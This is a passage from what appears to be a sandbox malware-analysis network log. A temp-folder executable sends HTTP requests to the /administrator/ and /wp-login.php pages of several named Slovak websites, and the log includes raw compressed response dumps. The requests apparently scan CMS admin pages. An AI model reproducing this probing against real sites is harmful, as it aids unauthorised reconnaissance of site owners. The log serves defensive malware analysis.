                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.879959106 CET360INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:29 GMT
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                Content-Length: 184
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 4e bb 0e 82 30 14 dd fb 15 57 16 27 b9 f8 18 9b 0e f2 88 24 a8 0c 75 70 2c b4 09 4d 80 92 b6 92 f8 f7 52 58 1c cf fb d0 5d f6 4c f9 bb ce e1 c6 ef 15 d4 af 6b 55 a6 10 1d 10 cb 9c 17 88 19 cf 36 e5 14 27 88 f9 23 62 84 76 7e e8 19 ed 94 90 0b f0 da f7 8a 5d 92 33 14 c6 36 5a 4a 35 52 dc 48 42 71 35 d1 c6 c8 6f c8 1d d9 9f 67 41 84 4e ec 6d 3e 20 cd b8 f7 d0 89 59 c1 a4 ec a0 9d d3 66 04 6f 40 b4 ad 72 0e 50 c8 41 8f da 79 2b bc b1 48 82 d8 69 07 4e d9 59 d9 98 e2 14 b6 d6 95 a5 37 bc 23 3f 3a 85 57 0e d8 00 00 00
                                                                                                                                                                                                                                                                                                                                Data Ascii: MN0W'$up,MRX]LkU6'#bv~]36ZJ5RHBq5ogANm> Yfo@rPAy+HiNY7#?:W
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.880218029 CET222OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: rotas.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Referer: http://rotas.sk/administrator/
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.139431000 CET370INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:29 GMT
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                Content-Length: 194
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e b9 0e c2 30 10 44 7b 7f c5 42 43 45 36 1c a5 e5 02 12 04 52 38 8a 50 50 3a f1 4a b6 94 d8 96 6d 22 f8 7b 12 68 28 67 e7 ad de f0 59 71 dd d7 8f 5b 09 c7 fa 5c c1 ed be ab 4e 7b 98 2f 11 4f 65 7d 40 2c ea e2 d7 ac b3 1c b1 bc cc 05 e3 3a f5 9d e0 9a a4 1a 43 32 a9 23 b1 cd 37 70 70 a1 31 4a 91 e5 f8 3b 32 8e 5f 88 37 4e bd a7 bf 95 f8 63 c6 c4 b8 17 0f f7 04 e5 ec 22 81 96 03 81 a7 d0 9b 18 8d b3 90 1c c8 b6 a5 18 01 a5 ea 8d 35 31 05 99 5c 40 63 15 bd 32 af 3d 9b 28 6d 22 44 0a 03 85 8c a3 9f a4 5f dd 28 98 66 b2 0f 44 45 bb 81 e1 00 00 00
                                                                                                                                                                                                                                                                                                                                Data Ascii: M0D{BCE6R8PP:Jm"{h(gYq[\N{/Oe}@,:C2#7pp1J;2_7Nc"51\@c2=(m"D_(fDE


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                97192.168.2.45488246.229.230.81805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.625233889 CET172OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: rotas.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.880261898 CET360INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:29 GMT
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                Content-Length: 184
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 4e bb 0e 82 30 14 dd fb 15 57 16 27 b9 f8 18 9b 0e f2 88 24 a8 0c 75 70 2c b4 09 4d 80 92 b6 92 f8 f7 52 58 1c cf fb d0 5d f6 4c f9 bb ce e1 c6 ef 15 d4 af 6b 55 a6 10 1d 10 cb 9c 17 88 19 cf 36 e5 14 27 88 f9 23 62 84 76 7e e8 19 ed 94 90 0b f0 da f7 8a 5d 92 33 14 c6 36 5a 4a 35 52 dc 48 42 71 35 d1 c6 c8 6f c8 1d d9 9f 67 41 84 4e ec 6d 3e 20 cd b8 f7 d0 89 59 c1 a4 ec a0 9d d3 66 04 6f 40 b4 ad 72 0e 50 c8 41 8f da 79 2b bc b1 48 82 d8 69 07 4e d9 59 d9 98 e2 14 b6 d6 95 a5 37 bc 23 3f 3a 85 57 0e d8 00 00 00
                                                                                                                                                                                                                                                                                                                                Data Ascii: MN0W'$up,MRX]LkU6'#bv~]36ZJ5RHBq5ogANm> Yfo@rPAy+HiNY7#?:W
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.880526066 CET222OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: rotas.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Referer: http://rotas.sk/administrator/
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.139580965 CET370INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:29 GMT
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                Content-Length: 194
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e b9 0e c2 30 10 44 7b 7f c5 42 43 45 36 1c a5 e5 02 12 04 52 38 8a 50 50 3a f1 4a b6 94 d8 96 6d 22 f8 7b 12 68 28 67 e7 ad de f0 59 71 dd d7 8f 5b 09 c7 fa 5c c1 ed be ab 4e 7b 98 2f 11 4f 65 7d 40 2c ea e2 d7 ac b3 1c b1 bc cc 05 e3 3a f5 9d e0 9a a4 1a 43 32 a9 23 b1 cd 37 70 70 a1 31 4a 91 e5 f8 3b 32 8e 5f 88 37 4e bd a7 bf 95 f8 63 c6 c4 b8 17 0f f7 04 e5 ec 22 81 96 03 81 a7 d0 9b 18 8d b3 90 1c c8 b6 a5 18 01 a5 ea 8d 35 31 05 99 5c 40 63 15 bd 32 af 3d 9b 28 6d 22 44 0a 03 85 8c a3 9f a4 5f dd 28 98 66 b2 0f 44 45 bb 81 e1 00 00 00
                                                                                                                                                                                                                                                                                                                                Data Ascii: M0D{BCE6R8PP:Jm"{h(gYq[\N{/Oe}@,:C2#7pp1J;2_7Nc"51\@c2=(m"D_(fDE


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                98192.168.2.454899141.98.102.194805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.626231909 CET179OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: eshopy-katalog.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.896132946 CET1286INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                                                date: Thu, 21 Dec 2023 04:03:29 GMT
                                                                                                                                                                                                                                                                                                                                content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                transfer-encoding: chunked
                                                                                                                                                                                                                                                                                                                                vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips DAV/2 mod_bwlimited/1.4
                                                                                                                                                                                                                                                                                                                                retry-after: 592
                                                                                                                                                                                                                                                                                                                                content-encoding: gzip
                                                                                                                                                                                                                                                                                                                                Data Raw: 34 43 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 bd 57 eb 6f db 36 10 ff 9e bf e2 ea c0 70 82 49 b6 1e 96 63 bb b2 b1 ae ed b0 7c 18 36 34 e9 87 6d d8 07 4a 3a d9 5c 28 51 a3 e8 38 ee d0 ff 7d 47 49 7e a9 4e 8a 1a c3 68 eb 41 de f1 c7 e3 bd 78 0a 5f 25 32 d6 9b 02 61 a9 33 31 bf 08 cd 03 04 cb 17 b3 0e e6 9d f9 05 8d 20 4b e6 17 40 2d cc 50 33 88 97 4c 95 a8 67 9d 95 4e ed 71 e7 90 94 b3 0c 67 9d 47 8e eb 42 2a dd 81 58 e6 1a 73 62 5d f3 44 2f 67 09 3e f2 18 ed aa 63 01 cf b9 e6 4c d8 65 cc 04 ce 5c 0b ca a5 e2 f9 83 ad a5 9d 72 3d cb e5 09 68 25 23 a9 cb 03 e0 5c f2 3c c1 27 0b 72 99 4a 21 e4 da bc 31 15 2f f9 23 6e e7 6b ae 05 ce df 2b 25 15 0c 1d 3f 1c d4 03 35 b1 d4 9b ed bb 69 66 fb d6 ae 17 c9 64 03 ff ec ba 15 03 f2 c5 52 4f c1 75 9c ee eb 23 4a b5 ad 53 84 8c a9 05 cf a7 e0 1c 0f 17 2c 49 78 be 38 1a ff bc 7b 7b 49 86 94 76 6f a7 2c e3 62 33 05 9b 15 85 40 bb dc 94 1a 33 0b 7e 10 a4 c3 9f 59 7c 57 f5 7f 24 4e 0b 3a 77 b8 90 08 1f 6f 3b 16 7c 30 1a 94 16 fc 84 e2 11 35 8f 99 05 6f 14 99 81 d4 cf f2 d2 2e 51 f1 94 66 bc 31 a0 f0 56 0a d2 d9 fb 4c fe c5 3b 07 30 27 46 ee 36 59 24 45 e7 78 87 11 8b 1f 16 4a ae f2 c4 8e 0d d2 14 96 a5 60 57 8e 05 4e d7 aa 14 45 f7 eb 67 e7 f0 8c 2d 70 0a 8a 25 c6 4d 16 e6 49 36 bf 62 1a 5c bf 0b 93 09 cd ae f0 bc 60 7c 8c 08 4e 41 1e a1 15 6d a8 60 8a e6 40 e0 74 af ad 53 48 37 1e 21 8d b6 48 be 77 36 d0 f8 a6 0b 23 7f 0b e4 7a e7 23 0d 27 5d 08 82 3d d2 e8 6c a4 c0 ed 82 3b dc a9 c9 39 5f 26 a3 f0 9d 48 de f0 7c 20 9f d4 e4 dd ec f5 ed 6f 51 86 ee b7 42 b9 b4 3b 7f 67 3a cf 0b 2c b8 31 06 f0 bc 6f 45 1a 07 5d 18 8e ff 13 a1 c6 c3 ae d9 e3 b7 09 d5 ca 0b b2 a4 c4 28 29 61 28 14 4c 53 22 7b 31 3f 2c dd 56 76 b0 d7 18 3d 70 6d 1f 46 9f e0 c5 14 34 3e e9 d7 27 59 0d 85 92 ae 10 db 38 3d 90 f0 f9 90 7e 06 f4 2c b0 26 d6 29 79 21 53 7b 8d 92 e3 05 09 2e 2c b8 4c 7c c7 19 93 df 5d 3a a9 37 1c f9 6d 9d d5 b9 94 ce 0e 12 c9 e9 07 98 bd a8 b3 4b 73 7e 30 5a 4b b5 74 d7 e4 70 df 39 04 30 6d 97 c3 81 ad b4 6c 6d 43 3e d9 e5 92 25 72 4d 26 5b 44 26 21 91 d9 f7 37 a7 5f 1b 1e dc e6 32 ef 3c a7 33 d4 aa f9 03 ca 88 e6 9a f8 86 d9 0b 6a ee a0 9a e2 98 bb ed 55 7e 53 31 9b ec 59 ff fb 7e cd e8 9b db a8 e2 33 af cf e9 78 0a 97 69 9a 9e 76 80 48 aa 04 95 6d d4 be 2a a7 10 b4 51 ec 4c 7e fa 2a d3 d7 e8 7b c7 66 51 29 c5 4a e3 31 bd 32 5e d0 3e 3d 05 a6 fa c4 70 e5 54 a9 54 59 e3 5f 14 29 78 65 07 26 6a ed 2f 63 aa f2 49 26 f8 82 16 8f c9 b1 50 bd e8 1f df 67 48 91 0d 32 17 1b 28 63 85 98 03 cb 13 b8 ca d8 93 dd b8 c8 d0 18 e6 ba e5 3e cf fa 95 69 cd c4 b1 d3 3d 22 7d 3e 4b 10 9e ef 05 71 8d 20 6d f9 26 a3 ff 43 be cb 84 6a 33 2e ca 16 5c 13 f8 97 93 d4 fc 8e 4d 51 15 2f 25 ff 84 26 50 c7 ed 38 db 15 45 2e 66 d5 e5 d5 cf 17 cd 15 cb 04 4f 95 48 f5 2a 6e df ff 5a 3e 58 b6 f5 d1 b8 72 93 4e 8c 1c e4 b0 3c a1 08 72 cc ef a4 df 53 5d a5 65 f6 45 99 d7 50 6b 37 3e 4d 53 75 49 d9 22 d6 29 a7 96 c1 fb 72 03 e1 a0 29 5d c3 41 5d a1 5f 84 a6 54 6c ca da 84 3f 02 4f 66 9d 9d c1 3b fb 1a 37 5c ba 87 d5 30 f5 f6 a4 62 fe 9b 5c 29 3a 79 fe 5e 61 a9
                                                                                                                                                                                                                                                                                                                                Data Ascii: 4C1Wo6pIc|64mJ:\(Q8}GI~NhAx_%2a31 K@-P3LgNqgGB*Xsb]D/g>cLe\r=h%#\<'rJ!1/#nk+%?5ifdROu#JS,Ix8{{Ivo,b3@3~Y|W$N:wo;|05o.Qf1VL;0'F6Y$ExJ`WNEg-p%MI6b\`|NAm`@tSH7!Hw6#z#']=l;9_&H| oQB;g:,1oE]()a(LS"{1?,Vv=pmF4>'Y8=~,&)y!S{.,L|]:7mKs~0ZKtp90mlmC>%rM&[D&!7_2<3jU~S1Y~3xivHm*QL~*{fQ)J12^>=pTTY_)xe&j/cI&PgH2(c>i="}>Kq m&Cj3.\MQ/%&P8E.fOH*nZ>XrN<rS]eEPk7>MSuI")r)]A]_Tl?Of;7\0b\):y^a
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.896269083 CET228INData Raw: 61 c9 4a 88 8c d7 45 42 c6 0f 98 bc 0a 07 c5 21 90 82 c1 41 77 bb 68 e3 14 07 4b 56 e4 32 63 42 1c 8f 99 f6 a1 59 eb f6 dd 14 42 63 ca f9 38 0e 26 b1 13 dd a4 11 1b 8e 82 c4 c3 00 13 4c c6 09 b2 38 1a 0e d3 9b 70 50 b1 85 d1 d1 f2 db 76 cf 33 82
                                                                                                                                                                                                                                                                                                                                Data Ascii: aJEB!AwhKV2cBYBc8&L8pPv3cY)rx(k)Yw&k\Nzb,A`w3Be!{8wm5^e+r+x}{`+qb8 jw0_rZ0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.897169113 CET224OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: eshopy-katalog.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Referer: http://eshopy-katalog.sk/wp-login.php
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.152879000 CET1286INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                                                date: Thu, 21 Dec 2023 04:03:30 GMT
                                                                                                                                                                                                                                                                                                                                content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                transfer-encoding: chunked
                                                                                                                                                                                                                                                                                                                                vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips DAV/2 mod_bwlimited/1.4
                                                                                                                                                                                                                                                                                                                                retry-after: 592
                                                                                                                                                                                                                                                                                                                                content-encoding: gzip
                                                                                                                                                                                                                                                                                                                                Data Raw: 34 43 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 bd 57 59 6f e3 36 10 7e cf af 98 75 60 38 41 25 5b 87 e5 d8 8e 6c 74 bb bb 45 f3 50 b4 d8 64 1f da a2 0f b4 34 b2 d9 50 a2 4a d1 71 bc c5 fe f7 0e 25 f9 52 9c 04 31 8a d2 d6 41 ce f0 e3 70 2e 8e c2 77 b1 8c f4 3a 47 58 e8 54 4c cf 42 f3 00 c1 b2 f9 a4 85 59 6b 7a 46 23 c8 e2 e9 19 50 0b 53 d4 0c a2 05 53 05 ea 49 6b a9 13 7b d8 da 27 65 2c c5 49 eb 81 e3 2a 97 4a b7 20 92 99 c6 8c 58 57 3c d6 8b 49 8c 0f 3c 42 bb ec 58 c0 33 ae 39 13 76 11 31 81 13 d7 82 62 a1 78 76 6f 6b 69 27 5c 4f 32 79 04 5a c9 99 d4 c5 1e 70 26 79 16 e3 a3 05 99 4c a4 10 72 65 de 98 8a 16 fc 01 37 f3 35 d7 02 a7 9f 94 92 0a fa 8e 1f f6 aa 81 8a 58 e8 f5 e6 dd 34 b3 7d 6b db 9b c9 78 0d ff 6c bb 25 03 f2 f9 42 8f c1 75 9c f6 f5 01 a5 dc d6 31 42 ca d4 9c 67 63 70 0e 87 73 16 c7 3c 9b 1f 8c 7f db be bd 24 43 42 bb b7 13 96 72 b1 1e 83 cd f2 5c a0 5d ac 0b 8d a9 05 3f 08 d2 e1 cf 2c ba 2d fb 3f 12 a7 05 ad 5b 9c 4b 84 2f 37 2d 0b 3e 1b 0d 4a 0b 7e 42 f1 80 9a 47 cc 82 f7 8a cc 40 ea 67 59 61 17 a8 78 42 33 de 1b 50 f8 20 05 e9 ec 53 2a ff e2 ad 3d 98 23 23 b7 eb 74 26 45 eb 70 87 33 16 dd cf 95 5c 66 b1 1d 19 a4 31 2c 0a c1 2e 1c 0b 9c b6 55 2a 8a ee 97 cf ce e1 29 9b e3 18 14 8b 8d 9b cc cd 93 6c 7e c1 34 b8 7e 1b 46 23 9a 5d e2 79 c1 f0 10 11 9c 9c 3c 42 2b da 50 ce 14 cd 81 c0 69 5f 5a c7 90 ae 3c 42 1a 6c 90 7c ef 64 a0 e1 55 1b 06 fe 06 c8 f5 4e 47 ea 8f da 10 04 3b a4 c1 c9 48 81 db 06 b7 bf 55 93 73 ba 4c 46 e1 5b 91 bc fe e9 40 3e a9 c9 bb da e9 db df a0 f4 dd b7 42 b9 b4 3b 7f 6b 3a cf 0b 2c b8 32 06 f0 bc b7 22 0d 83 36 f4 87 ff 89 50 c3 7e db ec f1 6d 42 35 f2 82 2c 28 31 4a 4a 18 0a 05 d3 94 c8 5e cc 0f 0b b7 91 1d ec 15 ce ee b9 b6 f7 a3 4f f0 7c 0c 1a 1f f5 f5 51 56 43 a1 a4 2b c4 26 4e f7 24 7c 3e a4 9f 01 3d 09 ac 8e 75 4a 5e c8 d4 4e a3 e4 78 41 8c 73 0b ce 63 df 71 86 e4 77 e7 4e e2 f5 07 7e 53 67 55 2e a5 b3 83 44 72 ba 01 a6 2f ea ec dc 9c 1f 8c d6 52 0d dd d5 39 dc 77 f6 01 4c db e6 70 60 4b 2d 1b db 90 8f 76 b1 60 b1 5c 91 c9 e6 33 93 90 c8 ec bb 9b d3 ad 0c 0f 6e 7d 99 77 9e d1 19 6a 55 fc 01 65 44 73 8d 7c c3 ec 05 15 77 50 4e 71 cc dd f6 4a bf 29 99 4d f6 ac fe 5d bf 62 f4 cd 6d 50 f2 99 d7 e7 74 3c 86 f3 24 49 8e 3b c0 4c aa 18 95 6d d4 be 2c c6 10 34 51 ec 54 7e 7d 95 e9 35 fa ce b1 d9 ac 90 62 a9 f1 90 5e 1a 2f 68 9e 9e 02 13 7d 64 b8 74 aa 44 aa b4 f6 2f 8a 14 bc b0 03 13 b5 f6 d3 98 2a 7d 92 09 3e a7 c5 23 72 2c 54 2f fa c7 f7 29 52 64 83 cc c4 1a 8a 48 21 66 c0 b2 18 2e 52 f6 68 d7 2e d2 37 86 b9 6c b8 cf b3 7e 65 5a 3d 71 e8 b4 0f 48 df 4e 12 84 67 3b 41 5c 23 48 53 be d1 e0 ff 90 ef 3c a6 da 8c 8b a2 01 57 07 fe f9 28 31 bf 43 53 94 c5 4b c1 bf a2 09 d4 61 33 ce b6 45 91 8b 69 79 79 d5 f3 45 73 45 32 c6 63 25 52 b5 8a db f5 5f cb 07 8b a6 3e 6a 57 ae d3 89 91 83 1c 96 c7 14 41 8e f9 1d f5 7b aa ab b4 4c 9f 94 79 35 b5 72 e3 e3 34 55 95 94 0d 62 95 72 2a 19 bc a7 1b 08 7b 75 e9 1a f6 aa 0a fd 2c 34 a5 62 5d d6 c6 fc 01 78 3c 69 6d 0d de da d5 b8 e1 c2 dd af 86 a9 b7 23 e5 d3 df e4 52 d1 c9 f3 f7 12 0b 0d
                                                                                                                                                                                                                                                                                                                                Data Ascii: 4C0WYo6~u`8A%[ltEPd4PJq%R1Ap.w:GXTLBYkzF#PSSIk{'e,I*J XW<I<BX39v1bxvoki'\O2yZp&yLre75X4}kxl%Bu1Bgcps<$CBr\]?,-?[K/7->J~BG@gYaxB3P S*=##t&Ep3\f1,.U*)l~4~F#]y<B+Pi_Z<Bl|dUNG;HUsLF[@>B;k:,2"6P~mB5,(1JJ^O|QVC+&N$|>=uJ^NxAscqwN~SgU.Dr/R9wLp`K-v`\3n}wjUeDs|wPNqJ)M]bmPt<$I;Lm,4QT~}5b^/h}dtD/*}>#r,T/)RdH!f.Rh.7l~eZ=qHNg;A\#HS<W(1CSKa3EiyyEsE2c%R_>jWA{Ly5r4Ubr*{u,4b]x<im#R
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.152992010 CET227INData Raw: 0b 56 c0 cc 78 dd 4c c8 e8 1e e3 77 61 2f df 07 52 d0 db eb 6e 16 ad 9d 62 6f c9 92 5c a4 4c 88 c3 31 d3 3e d7 6b dd 7c 1c 43 68 4c 39 bd 1a 90 c5 e2 68 10 38 c8 28 ed 33 1c 0c 06 6e 3c 42 64 49 d4 8f bd 59 d8 2b d9 c2 d9 c1 f2 9b 76 c7 53 82 63
                                                                                                                                                                                                                                                                                                                                Data Ascii: VxLwa/Rnbo\L1>k|ChL9h8(3n<BdIY+vSci)rxL)+)Yd&k\vVzs"u,@gow3BE.t;8wCRo~rvEunu=1kh1{;/%j0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                99192.168.2.454900141.98.102.194805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.626435995 CET179OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: eshopy-katalog.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.892559052 CET1286INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                                                date: Thu, 21 Dec 2023 04:03:29 GMT
                                                                                                                                                                                                                                                                                                                                content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                transfer-encoding: chunked
                                                                                                                                                                                                                                                                                                                                vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips DAV/2 mod_bwlimited/1.4
                                                                                                                                                                                                                                                                                                                                retry-after: 592
                                                                                                                                                                                                                                                                                                                                content-encoding: gzip
                                                                                                                                                                                                                                                                                                                                Data Raw: 34 43 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 bd 57 59 6f e3 36 10 7e cf af 98 55 60 d8 46 25 5b 87 e5 2b b2 d1 ed ee 16 cd 43 d1 62 93 7d 68 8b 3e 50 12 65 b3 a1 44 95 a2 e3 78 8b fd ef 1d 4a f2 a5 38 0e 62 14 a5 ad 83 9c e1 c7 e1 5c 1c 05 ef 62 11 a9 4d 4e 61 a9 52 3e bf 0a f4 03 38 c9 16 33 83 66 c6 fc 0a 47 28 89 e7 57 80 2d 48 a9 22 10 2d 89 2c a8 9a 19 2b 95 58 63 e3 90 94 91 94 ce 8c 47 46 d7 b9 90 ca 80 48 64 8a 66 c8 ba 66 b1 5a ce 62 fa c8 22 6a 95 1d 13 58 c6 14 23 dc 2a 22 c2 e9 cc 31 a1 58 4a 96 3d 58 4a 58 09 53 b3 4c 9c 80 96 22 14 aa 38 00 ce 04 cb 62 fa 64 42 26 12 c1 b9 58 eb 37 22 a3 25 7b a4 db f9 8a 29 4e e7 9f a4 14 12 06 b6 17 f4 ab 81 8a 58 a8 cd f6 5d 37 bd 7d 73 d7 0b 45 bc 81 7f 76 dd 92 81 b2 c5 52 4d c1 b1 ed d6 cd 11 a5 dc d6 29 42 4a e4 82 65 53 b0 8f 87 73 12 c7 2c 5b 1c 8d 7f db bd 9d 93 21 c1 dd 5b 09 49 19 df 4c c1 22 79 ce a9 55 6c 0a 45 53 13 7e e0 a8 c3 9f 49 74 57 f6 7f 44 4e 13 8c 3b ba 10 14 be dc 1a 26 7c d6 1a 14 26 fc 44 f9 23 55 2c 22 26 bc 97 68 06 54 3f c9 0a ab a0 92 25 38 e3 bd 06 85 0f 82 a3 ce 3e a5 e2 2f 66 1c c0 9c 18 b9 db a4 a1 e0 c6 f1 0e 43 12 3d 2c a4 58 65 b1 15 69 a4 29 2c 0b 4e 3a b6 09 76 cb 2c 15 85 f7 ee 8b 73 58 4a 16 74 0a 92 c4 da 4d 16 fa 89 36 ef 10 05 8e d7 82 c9 04 67 97 78 ae 3f 3e 46 04 3b 47 8f 50 12 37 94 13 89 73 c0 b7 5b 5d f3 14 d2 c8 45 a4 e1 16 c9 73 2f 06 1a 8f 5a 30 f4 b6 40 8e 7b 39 d2 60 d2 02 df df 23 0d 2f 46 f2 9d 16 38 83 9d 9a ec cb 65 d2 0a df 89 e4 0e 2e 07 f2 50 4d ee 68 af 6f 6f 8b 32 70 de 0a e5 e0 ee bc 9d e9 5c d7 37 61 a4 0d e0 ba 6f 45 1a fb 2d 18 8c ff 13 a1 c6 83 96 de e3 db 84 6a e4 05 51 60 62 14 98 30 24 e5 44 61 22 3b 9b 1f 96 4e 23 3b 58 6b 1a 3e 30 65 1d 46 1f 67 f9 14 14 7d 52 37 27 59 35 05 93 2e e7 db 38 3d 90 f0 e5 90 7e 01 f4 22 b0 3a d6 31 79 51 22 f7 1a 45 c7 f3 63 ba 30 e1 3a f6 6c 7b 8c 7e 77 6d 27 ee 60 e8 35 75 56 e5 52 3c 3b 50 24 bb e7 d3 f4 ac ce ae f5 f9 41 70 2d d9 d0 5d 9d c3 3d fb 10 40 b7 5d 0e 07 b2 52 a2 b1 0d f1 64 15 4b 12 8b 35 9a 6c 11 ea 84 84 66 df df ec 5e 65 78 70 ea 4b bf b3 0c cf 50 b3 e2 f7 31 23 ea 6b e2 69 66 d7 af b8 fd 72 8a ad ef 96 5b fa 4d c9 ac b3 67 f5 ef 79 15 a3 a7 6f c3 92 4f bf be a4 e3 29 5c 27 49 72 da 01 42 21 63 2a 2d ad f6 55 31 05 bf 89 62 a5 e2 eb ab 4c af d1 f7 8e 4d c2 42 f0 95 a2 c7 f4 d2 78 7e f3 f4 e4 34 51 27 86 4b a7 4a 84 4c 6b ff c2 48 a1 1d cb d7 51 6b 3d 8f a9 d2 27 09 67 0b 5c 3c 42 c7 a2 f2 ac 7f 7c 9f 52 8c 6c 10 19 df 40 11 49 4a 33 20 59 0c 9d 94 3c 59 b5 8b 0c b4 61 ba 0d f7 79 d1 af 74 ab 27 8e ed d6 11 e9 db 45 82 b0 6c 2f 88 a3 05 69 ca 